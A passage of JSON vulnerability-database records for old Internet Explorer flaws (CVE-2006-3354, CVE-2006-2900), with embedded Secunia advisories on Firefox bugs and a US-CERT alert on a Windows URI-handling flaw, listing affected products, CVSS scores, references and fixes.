"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ie",
"scope": "eq",
"trust": 1.6,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.6,
"vendor": "microsoft",
"version": "6"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "network camera server vb101",
"scope": "eq",
"trust": 1.0,
"vendor": "canon",
"version": "*"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2800.1106"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2800"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2600"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2900.2180"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2900.2180"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2800"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2600"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2800.1106"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
}
],
"sources": [
{
"db": "BID",
"id": "18773"
},
{
"db": "NVD",
"id": "CVE-2006-3354"
},
{
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800.1106:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_98:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1_itanium_systems:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2600:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_xp_professional_64bit:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1_itanium:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_xpsp1:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900.2180:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:*:windows_server_2003:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_98_se:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_millennium:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:canon:network_camera_server_vb101:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-3354"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "H D Moore hdm@metasploit.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
],
"trust": 0.6
},
"cve": "CVE-2006-3354",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-19462",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2006-3354",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200607-017",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-19462",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-19462"
},
{
"db": "NVD",
"id": "CVE-2006-3354"
},
{
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (crash) by setting the Filter property of an ADODB.Recordset ActiveX object to certain values multiple times, which triggers a null dereference. Microsoft Internet Explorer is prone to a denial-of-service condition when processing the \u0027ADODB.Recordset Filter Property\u0027 COM object. \nA successful attack may cause the browser to fail due to a null-pointer dereference. Microsoft Internet Explorer is a very popular WEB browser released by Microsoft. When the properties of the ADODB.Recordset ActiveX object are assigned different values \u200b\u200bthree times, the null pointer reference problem will be triggered. If the user is tricked into accessing a malicious WEB page containing malformed ActiveX reference code, it will cause IE to deny service",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-3354"
},
{
"db": "BID",
"id": "18773"
},
{
"db": "VULHUB",
"id": "VHN-19462"
}
],
"trust": 1.26
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-19462",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-19462"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "18773",
"trust": 2.0
},
{
"db": "OSVDB",
"id": "26834",
"trust": 1.7
},
{
"db": "NVD",
"id": "CVE-2006-3354",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-200607-017",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "28145",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-19462",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-19462"
},
{
"db": "BID",
"id": "18773"
},
{
"db": "NVD",
"id": "CVE-2006-3354"
},
{
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
]
},
"id": "VAR-200607-0093",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-19462"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:47:05.013000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-3354"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://browserfun.blogspot.com/2006/07/mobb-1-adodbrecordset-filter-property.html"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/18773"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/26834"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27596"
},
{
"trust": 0.3,
"url": "http://www.microsoft.com/windows/ie/default.mspx"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-19462"
},
{
"db": "BID",
"id": "18773"
},
{
"db": "NVD",
"id": "CVE-2006-3354"
},
{
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-19462"
},
{
"db": "BID",
"id": "18773"
},
{
"db": "NVD",
"id": "CVE-2006-3354"
},
{
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-07-06T00:00:00",
"db": "VULHUB",
"id": "VHN-19462"
},
{
"date": "2006-07-03T00:00:00",
"db": "BID",
"id": "18773"
},
{
"date": "2006-07-06T01:05:00",
"db": "NVD",
"id": "CVE-2006-3354"
},
{
"date": "2006-07-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-20T00:00:00",
"db": "VULHUB",
"id": "VHN-19462"
},
{
"date": "2006-07-04T20:54:00",
"db": "BID",
"id": "18773"
},
{
"date": "2021-07-23T15:04:41.580000",
"db": "NVD",
"id": "CVE-2006-3354"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Microsoft Internet Explorer ADODB.Recordset Null pointer reference denial of service vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
],
"trust": 0.6
}
}
VAR-200606-0464
Vulnerability from variot - Updated: 2023-12-18 11:05Internet Explorer 6 allows user-assisted remote attackers to read arbitrary files by tricking a user into typing the characters of the target filename in a text box and using the OnKeyDown, OnKeyPress, and OnKeyUp Javascript keystroke events to change the focus and cause those characters to be inserted into a file upload input control, which can then upload the file when the user submits the form. Mozilla Firefox allows cross-domain access to an iframe. This vulnerability could allow an attacker to interact with a web site in a different domain. The attacker could read content and cookies, capture keystrokes, and modify content. Mozilla Firefox does not filter input when sending certain URIs to registered protocol handlers. This may allow a remote, authenticated attacker to use Firefox as a vector for executing commands on a vulnerable system.
Want to join the Secunia Security Team?
Secunia offers a position as a security specialist, where your daily work involves reverse engineering of software and exploit code, auditing of source code, and analysis of vulnerability reports.
SOLUTION: Disable Active Scripting support.
Do not enter suspicious text when visiting untrusted web sites.
Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure.
The Full Featured Secunia Network Software Inspector (NSI) is now available: http://secunia.com/network_software_inspector/
The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications.
TITLE: Mozilla Firefox Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA26095
VERIFY ADVISORY: http://secunia.com/advisories/26095/
CRITICAL: Highly critical
IMPACT: Cross Site Scripting, Spoofing, DoS, System access
WHERE:
From remote
SOFTWARE: Mozilla Firefox 2.0.x http://secunia.com/product/12434/
DESCRIPTION: Some vulnerabilities have been reported in Mozilla Firefox, which can be exploited by malicious people to conduct spoofing and cross-site scripting attacks and potentially to compromise a user's system.
1) Various errors in the browser engine can be exploited to cause memory corruption and potentially to execute arbitrary code.
2) Various errors in the Javascript engine can be exploited to cause memory corruption and potentially to execute arbitrary code.
3) An error in the "addEventListener" and "setTimeout" methods can be exploited to inject script into another site's context, circumventing the browser's same-origin policy.
4) An error in the cross-domain handling can be exploited to inject arbitrary HTML and script code in a sub-frame of another web site.
This is related to vulnerability #5 in: SA21906
5) An unspecified error in the handling of elements outside of documents allows an attacker to call an event handler and execute arbitrary code with chrome privileges.
6) An unspecified error in the handling of "XPCNativeWrapper" can lead to execution of user-supplied code.
SOLUTION: Update to version 2.0.0.5.
PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Bernd Mielke, Boris Zbarsky, David Baron, Daniel Veditz, Jesse Ruderman, Lukas Loehrer, Martijn Wargers, Mats Palmgren, Olli Pettay, Paul Nickerson, and Vladimir Sukhoy. 2) The vendor credits Asaf Romano, Jesse Ruderman, and Igor Bukanov. 3, 5) The vendor credits moz_bug_r_a4 4) Ronen Zilberman and Michal Zalewski 6) The vendor credits shutdown and moz_bug_r_a4.
ORIGINAL ADVISORY: http://www.mozilla.org/security/announce/2007/mfsa2007-18.html http://www.mozilla.org/security/announce/2007/mfsa2007-19.html http://www.mozilla.org/security/announce/2007/mfsa2007-20.html http://www.mozilla.org/security/announce/2007/mfsa2007-21.html http://www.mozilla.org/security/announce/2007/mfsa2007-25.html
OTHER REFERENCES: SA21906: http://secunia.com/advisories/21906/
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
.
BETA test the new Secunia Personal Software Inspector!
The Secunia PSI detects installed software on your computer and categorises it as either Insecure, End-of-Life, or Up-To-Date. Effectively enabling you to focus your attention on software installations where more secure versions are available from the vendors.
The vulnerability is caused due to an error within the handling of "about:blank" pages loaded by chrome in an addon. This can be exploited to execute script code under chrome privileges by e.g. clicking on a link opened in an "about:blank" window created and populated in a certain ways by an addon.
Successful exploitation requires that certain addons are installed. http://www.mozilla.com/en-US/firefox/
Thunderbird: Fixed in the upcoming version 2.0.0.6. http://www.mozilla.com/en-US/thunderbird/
SeaMonkey: Fixed in the upcoming version 1.1.4.
For more information: SA26201
PROVIDED AND/OR DISCOVERED BY: moz_bug_r_a4
CHANGELOG: 2007-07-31: Updated "Description". Added link to vendor advisory. "mailto", "news", "nntp", "snews", "telnet"). using Firefox visits a malicious website with a specially crafted "mailto" URI containing a "%" character and ends in a certain extension (e.g.
The vulnerability is confirmed on a fully patched Windows XP SP2 and Windows Server 2003 SP2 system using Firefox version 2.0.0.5 and Netscape Navigator version 9.0b2. Other versions and browsers may also be affected.
SOLUTION: Do not browse untrusted websites or follow untrusted links.
PROVIDED AND/OR DISCOVERED BY: Vulnerability discovered by: * Billy (BK) Rios
Firefox not escaping quotes originally discussed by: * Jesper Johansson
Additional research by Secunia Research. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
National Cyber Alert System
Technical Cyber Security Alert TA07-297B
Adobe Updates for Microsoft Windows URI Vulnerability
Original release date: October 24, 2007 Last revised: -- Source: US-CERT
Systems Affected
Microsoft Windows XP and Windows Server 2003 systems with Internet Explorer 7 and any of the following Adobe products: * Adobe Reader 8.1 and earlier * Adobe Acrobat Professional, 3D, and Standard 8.1 and earlier * Adobe Reader 7.0.9 and earlier * Adobe Acrobat Professional, 3D, Standard, and Elements 7.0.9 and earlier
Overview
Adobe has released updates for the Adobe Reader and Adobe Acrobat product families. The update addresses a URI handling vulnerability in Microsoft Windows XP and Server 2003 systems with Internet Explorer 7.
I. Description
Installing Microsoft Internet Explorer (IE) 7 on Windows XP or Server 2003 changes the way Windows handles Uniform Resource Identifiers (URIs). This change has introduced a flaw that can cause Windows to incorrectly determine the appropriate handler for the protocol specified in a URI. More information about this vulnerability is available in US-CERT Vulnerability Note VU#403150.
Public reports indicate that this vulnerability is being actively exploited with malicious PDF files. Adobe has released Adobe Reader 8.1.1 and Adobe Acrobat 8.1.1, which mitigate this vulnerability.
II.
III. Solution
Apply an update
Adobe has released Adobe Reader 8.1.1 and Adobe Acrobat 8.1.1 to address this issue. These Adobe products handle URIs in a way that mitigates the vulnerability in Microsoft Windows.
Disable the mailto: URI in Adobe Reader and Adobe Acrobat
If you are unable to install an updated version of the software, this vulnerability can be mitigated by disabling the mailto: URI handler in Adobe Reader and Adobe Acrobat. Please see Adobe Security Bulletin APSB07-18 for details.
Appendix A. Vendor Information
Adobe
For information about updating affected Adobe products, see Adobe Security Bulletin APSB07-18.
Appendix B. References
* Adobe Security Bulletin APSB07-18 -
<http://www.adobe.com/support/security/bulletins/apsb07-18.htm>
* Microsoft Security Advisory (943521) -
<http://www.microsoft.com/technet/security/advisory/943521.mspx>
* US-CERT Vulnerability Note VU#403150 -
<http://www.kb.cert.org/vuls/id/403150>
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA07-297B.html>
Feedback can be directed to US-CERT Technical Staff. Please send email to cert@cert.org with "TA07-297B Feedback VU#403150" in the subject.
For instructions on subscribing to or unsubscribing from this mailing list, visit http://www.us-cert.gov/cas/signup.html.
Produced 2007 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
Revision History
October 24, 2007: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux)
iQEVAwUBRx+8WPRFkHkM87XOAQIrOQf/USsBbfDmKZ4GCi8W2466mI+kZoEHoe/H 3l3p4/1cuFGoPHFfeDLbG+alXiHSAdXoX7Db34InEUKMs7kRUVPEdW9LggI9VaTJ lKnZJxM3dXL+zPCWcDkNqrmmzyJuXwN5FmSXhlcnN4+FRzNrZYwDe1UcOk3q6m1s VNPIBTrqfSuFRllNt+chV1vQ876LLweS+Xh1DIQ/VIyduqvTogoYZO4p2A0YJD57 4y0obNuk+IhgzyhZHtSsR0ql7rGrFr4S97XUQGbKOAZWcDzNGiXJ5FkrMTaP25OI LazBVDofVz8ydUcEkb4belgv5REpfYUJc9hRbRZ+IpbAay2j42m8NQ== =PgB9 -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200606-0464",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 2.4,
"vendor": "mozilla",
"version": null
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "5.01"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6"
},
{
"model": "network camera server vb101",
"scope": "eq",
"trust": 1.0,
"vendor": "canon",
"version": "*"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "adobe",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "microsoft",
"version": null
},
{
"model": "network camera server vb101",
"scope": null,
"trust": 0.6,
"vendor": "canon",
"version": null
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#143297"
},
{
"db": "CERT/CC",
"id": "VU#403150"
},
{
"db": "CERT/CC",
"id": "VU#783400"
},
{
"db": "NVD",
"id": "CVE-2006-2900"
},
{
"db": "CNNVD",
"id": "CNNVD-200606-183"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1_itanium:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:canon:network_camera_server_vb101:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:5.01:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_xp_professional_64bit:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_98:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_millennium:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_98_se:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_xpsp1:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-2900"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Secunia",
"sources": [
{
"db": "PACKETSTORM",
"id": "47071"
},
{
"db": "PACKETSTORM",
"id": "57832"
},
{
"db": "PACKETSTORM",
"id": "58191"
},
{
"db": "PACKETSTORM",
"id": "58068"
}
],
"trust": 0.4
},
"cve": "CVE-2006-2900",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 4.9,
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 4.9,
"id": "VHN-19008",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:H/AU:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2006-2900",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#143297",
"trust": 0.8,
"value": "8.51"
},
{
